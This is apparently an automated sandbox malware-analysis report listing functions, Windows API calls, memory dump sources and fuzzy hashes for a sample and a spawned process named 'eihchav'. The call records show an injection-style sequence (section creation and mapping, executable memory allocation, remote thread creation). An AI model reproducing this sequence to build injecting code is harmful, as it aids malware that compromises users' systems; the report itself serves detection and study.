Source File: 00000000.00000002.2113627890.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9VgIkx4su0.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
Instruction ID: 0621b20c29367ada74e4c9127c9a5516285bec5e68af8f441e6b7f153e3f788d
Opcode Fuzzy Hash: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
Instruction Fuzzy Hash: 11017CB560C204EAEB109AA49C61A7A3318AB44354F304537FA27790F5D67D9612E72F

Function 006213C5 Relevance: 1.3, APIs: 1, Instructions: 48
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 00621416

Memory Dump Source

Source File: 00000000.00000002.2114641854.000000000060F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0060F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60f000_9VgIkx4su0.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: a69f55f606376043e2b387c080955ed2affb2f59ee0a18a80be647a32b0a9953
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: 8E113C79A00208EFDB01DF98C985E98BBF5AF18750F1580A4F9489B362D371EA50DF80

Function 00401925 Relevance: 1.3, APIs: 1, Instructions: 46
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000000.00000002.2113627890.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9VgIkx4su0.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
Instruction ID: ea6e3854d66af35421fcd7571e0742f45a6e64d38424a4e1b6315f5079e28d0a
Opcode Fuzzy Hash: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
Instruction Fuzzy Hash: 28F08CB6208204EADB00AEA49C61EBA3318AB44314F304533FB23790F5C67D8612E72F

Non-executed Functions

Function 0209092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON

Download Yara Rule

Strings

GetProcAddress., xrefs: 020909DC, 020909DF, 020909E4
l, xrefs: 02090966
., xrefs: 0209095F

Memory Dump Source

Source File: 00000000.00000002.2114759693.0000000002090000.00000040.00001000.00020000.00000000.sdmp, Offset: 02090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2090000_9VgIkx4su0.jbxd

Yara matches

Similarity

API ID:
String ID: .$GetProcAddress.$l
API String ID: 0-2784972518
Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction ID: 8745802ab7d9cb4e2d3629555f7fc1262fed085cc3831b38a7b97a25a892d7da
Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction Fuzzy Hash: 303149B6901709DFDB11CF99C880AAEBBF6FF48324F14404AD842A7250D771EA45DBA4

Function 00403277 Relevance: .1, Instructions: 143COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2113627890.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9VgIkx4su0.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b629cad718851529a8349badf854aa4f42902f4158d62fe99d564dbe5f1e4d1
Instruction ID: d4c5b2d713ab9232080496078af059369c5345e186722ee5903dd3db8614e93b
Opcode Fuzzy Hash: 8b629cad718851529a8349badf854aa4f42902f4158d62fe99d564dbe5f1e4d1
Instruction Fuzzy Hash: 434131A181D2C24EDB435E3408A54E2BF79A96B32231C01FFD081EA1C7E2380B07939A

Function 0040324F Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2113627890.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9VgIkx4su0.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd713e8a9ffb35993257ca06bb1ca9cf03b0909bce816e3c168a85f7237ff4a9
Instruction ID: 47d85a717b2f9eb1e037dbaf55b436ab29ce309417f93d286f8d159decdfda18
Opcode Fuzzy Hash: bd713e8a9ffb35993257ca06bb1ca9cf03b0909bce816e3c168a85f7237ff4a9
Instruction Fuzzy Hash: 681101A1D1D2829BDF5B1E2108655767F6C6E7331772800FFD042BA2D2E23D5B02A26F

Function 00403256 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2113627890.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9VgIkx4su0.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8235a342c0a5ccfb7a676b72f8706d5939bc8c2cb4e96ca567b58c971c6cfde2
Instruction ID: 44dbed29d4116881d315b966fbacf1cf40a73d3247e8d5490da27da81908206f
Opcode Fuzzy Hash: 8235a342c0a5ccfb7a676b72f8706d5939bc8c2cb4e96ca567b58c971c6cfde2
Instruction Fuzzy Hash: 091120A1D1C2825BDF9B1E204C645B27F6C6A7332371800FFE402BA2D6E23D1B03925E

Function 00403247 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2113627890.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9VgIkx4su0.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f11a235e0e08faed31d233c350fe522c88a0f226e8326adf6e177ce42ec05621
Instruction ID: 6cc5313a22b02943346cb09be328e63b116041f9455492dba296d6b6c8d47a80
Opcode Fuzzy Hash: f11a235e0e08faed31d233c350fe522c88a0f226e8326adf6e177ce42ec05621
Instruction Fuzzy Hash: 0111E0A1C1D2829BDF5A2E2108648767F6C6A7731772800FFD042FA2D6E23D5B03A15F

Function 0040326C Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2113627890.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9VgIkx4su0.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ec03d413cbbfde9ae04b67bfcc6c031395faee012b42a8efe698a5ecb0e7cee
Instruction ID: 83c2e45a663ff97a83121d71df7fde14c7d1be506299b7fe0adcc4aca9f65d16
Opcode Fuzzy Hash: 9ec03d413cbbfde9ae04b67bfcc6c031395faee012b42a8efe698a5ecb0e7cee
Instruction Fuzzy Hash: 3211CBA1C1D2825BDFAA1E2108544B67F6CAA7771771400FFD402BA2D6E23D5B02929E

Function 00620FE3 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2114641854.000000000060F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0060F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60f000_9VgIkx4su0.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction ID: 3640d06e3431e45d951b569c0f0407e1203b08f0a609e0755369330c68f11b42
Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction Fuzzy Hash: 4C11A0723405109FD754CE55EC81EA673EAEB99360B298055ED04CB306DA75EC82CB60

Function 00403290 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2113627890.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9VgIkx4su0.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e274102659cc5964db6623cf4447b3957c7ecae9963d781930d0ebff3212451b
Instruction ID: 18a3bc8234d562e7f0c7d25340e1ec3d72d942eb246f5034c2dedc7c4f371e85
Opcode Fuzzy Hash: e274102659cc5964db6623cf4447b3957c7ecae9963d781930d0ebff3212451b
Instruction Fuzzy Hash: 3611E191D1C2820BDFA62E2048545B67F6C5A7335771840FFD401F62D6F13D1F02825A

Function 02090D90 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2114759693.0000000002090000.00000040.00001000.00020000.00000000.sdmp, Offset: 02090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2090000_9VgIkx4su0.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction ID: 51e27f711baa0beac550456bf3a7a8221260ae1a9e6dd3e2d78941d8acd67c85
Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction Fuzzy Hash: 2201D676A117048FDF22CF24C804BAA33FAFB86216F4544B5D90BD7281E774A941EB90

Analysis Process: eihchavPID: 7060, Parent PID: 1068COMMON

Execution Graph

Execution Coverage:	7.5%
Dynamic/Decrypted Code Coverage:	40.7%
Signature Coverage:	0%
Total number of Nodes:	118
Total number of Limit Nodes:	4

Executed Functions

Function 00401514 Relevance: 10.7, APIs: 7, Instructions: 201
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5

Memory Dump Source

Source File: 00000004.00000002.2339629279.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_eihchav.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
Instruction ID: b77a8bcfde574781322ebaec397cd5e92af5eb717990e6e7793f83a32abcc97b
Opcode Fuzzy Hash: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
Instruction Fuzzy Hash: 24615E71900244FBEB209F95CC49FAF7BB8EF85700F20412AF912BA1E5D6749A01DB69

Function 004014FE Relevance: 10.7, APIs: 7, Instructions: 180
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000004.00000002.2339629279.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_eihchav.jbxd

Similarity

API ID: Section$CreateDuplicateObjectView
String ID:
API String ID: 1652636561-0
Opcode ID: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
Instruction ID: 0ec8d6d4108695f7377ece7931361284e20275783593a2318d747dbe857377b0
Opcode Fuzzy Hash: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
Instruction Fuzzy Hash: 6A5129B5900209BFEB209F95CC48FEF7BB9EF85710F14412AF912BA2A5D6749901CB24

Function 00401542 Relevance: 10.7, APIs: 7, Instructions: 167
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5

Memory Dump Source

Source File: 00000004.00000002.2339629279.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_eihchav.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
Instruction ID: 759091ef041ca07c69b7a79068e02688b6544eb302bab9b440b0429bbb41aca5
Opcode Fuzzy Hash: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
Instruction Fuzzy Hash: E85119B1900249BFEB209F91CC48FAF7BB8EF85B10F144169F911BA2A5D6749941CB24

Function 00401549 Relevance: 10.7, APIs: 7, Instructions: 164
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5

Memory Dump Source

Source File: 00000004.00000002.2339629279.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_eihchav.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
Instruction ID: 7a8a064d68380c64131d995910f5c092f0e660b32494b1024d3e535184c76cf3
Opcode Fuzzy Hash: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
Instruction Fuzzy Hash: 78510875900249BFEF209F91CC48FAFBBB8FF86B10F144159F911AA2A5E6709940CB24

Function 00401557 Relevance: 10.7, APIs: 7, Instructions: 162
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5

Memory Dump Source

Source File: 00000004.00000002.2339629279.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_eihchav.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
Instruction ID: 25abb30e6883f9026caabbb74ebb32c420b3dbd3b7f631cb87a4d5ab1caa8f11
Opcode Fuzzy Hash: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
Instruction Fuzzy Hash: C75118B5900209BFEF209F91CC48FAFBBB8FF85B10F144169F911BA2A5D6709940CB24

Function 00402F97 Relevance: 3.2, APIs: 2, Instructions: 168
nativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlCreateUserThread.NTDLL ref: 004030CB
NtTerminateProcess.NTDLL ref: 004030E4

Memory Dump Source

Source File: 00000004.00000002.2339629279.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_eihchav.jbxd

Similarity

API ID: CreateProcessTerminateThreadUser
String ID:
API String ID: 1921587553-0
Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
Instruction ID: 1591ba869369ea84e79847af2efd18b9bf5795e6c00b1d775a4c0b4e714efbc4
Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
Instruction Fuzzy Hash: FD414531218E0C4FD7A8EF6CA88576277D5F798311F6643AAE809D3389EA74DC1183C5

Function 0209003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0209024D

Strings

kernel32.dll, xrefs: 0209008F, 02090095
cess, xrefs: 0209018D

Memory Dump Source

Source File: 00000004.00000002.2340049741.0000000002090000.00000040.00001000.00020000.00000000.sdmp, Offset: 02090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2090000_eihchav.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: 571f571e7d084fd000c4ea48e79ccf4338d86c462d87e49f6c0699987f3fdcf7
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: D4526A74A01229DFDBA4CF58C984BADBBB1BF09314F1480D9E54EAB351DB30AA85DF14

Function 005DFA3E Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 005DFA66
Module32First.KERNEL32(00000000,00000224), ref: 005DFA86

Memory Dump Source

Source File: 00000004.00000002.2339931516.00000000005CD000.00000040.00000020.00020000.00000000.sdmp, Offset: 005CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5cd000_eihchav.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: 3097cd784c994e762c5b5d75cbe1c0bc534667ab0dcdb442f5a1a72c50493ffd
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: 72F062311007116BD7302BFD988DB6E7AE8BF49724F10053BE64B916C0DB74EC458B61

Function 02090E0F Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00000400,?,?,02090223,?,?), ref: 02090E19
SetErrorMode.KERNELBASE(00000000,?,?,02090223,?,?), ref: 02090E1E

Memory Dump Source

Source File: 00000004.00000002.2340049741.0000000002090000.00000040.00001000.00020000.00000000.sdmp, Offset: 02090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2090000_eihchav.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: 10129a3fe212e682639f71971b88a6d26267ce46d9308158a6e3ab39f2dfc045
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: 5DD0123514522877DB412A94DC09BCD7B5DDF05B66F008011FB0DD9080C770954046E5

Function 004018E6 Relevance: 1.3, APIs: 1, Instructions: 63
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000004.00000002.2339629279.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_eihchav.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
Instruction ID: 08a90aa29aaa59261053d8f0d19a3ecdc4dd21bf61fce8c4d66a51d0c793aa75
Opcode Fuzzy Hash: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
Instruction Fuzzy Hash: EB11A1F660C204FAEB106AA49C61E7A3318AB40754F304137F613790F5957D9A13F66F

Function 00401915 Relevance: 1.3, APIs: 1, Instructions: 59
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000004.00000002.2339629279.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_eihchav.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
Instruction ID: d2c64d108ecd7190b789ce3c9d4f03e3911909dfd4099b6475a4add21270c3a3
Opcode Fuzzy Hash: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
Instruction Fuzzy Hash: 6D019EB7208208E6DB006AA5AC51ABA33189B44359F304537F723790F6D57D8612E72F

Function 004018F1 Relevance: 1.3, APIs: 1, Instructions: 55
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000004.00000002.2339629279.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_eihchav.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
Instruction ID: b5ca90d31d4069b8fd1e735589466699ca1bb5e14181e618ca72d4e2f39bbf06
Opcode Fuzzy Hash: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
Instruction Fuzzy Hash: D101D2B6608204EBDB019AF49C62A7A37549F44315F200137FA53790F1D67D8643E72F

Function 00401912 Relevance: 1.3, APIs: 1, Instructions: 52
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000004.00000002.2339629279.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_eihchav.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
Instruction ID: 0621b20c29367ada74e4c9127c9a5516285bec5e68af8f441e6b7f153e3f788d
Opcode Fuzzy Hash: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
Instruction Fuzzy Hash: 11017CB560C204EAEB109AA49C61A7A3318AB44354F304537FA27790F5D67D9612E72F

Function 005DF6FD Relevance: 1.3, APIs: 1, Instructions: 48
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 005DF74E

Memory Dump Source

Source File: 00000004.00000002.2339931516.00000000005CD000.00000040.00000020.00020000.00000000.sdmp, Offset: 005CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5cd000_eihchav.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: 039c5ed7a1010e4924be1c16ab3437b602c96d0a3f0e4449863e08e1cbcb80d4
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: 48112A79A00208EFDB01DF98C989E98BFF5AB08350F0580A5F9499B362D371EA50DB90

Function 00401925 Relevance: 1.3, APIs: 1, Instructions: 46
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

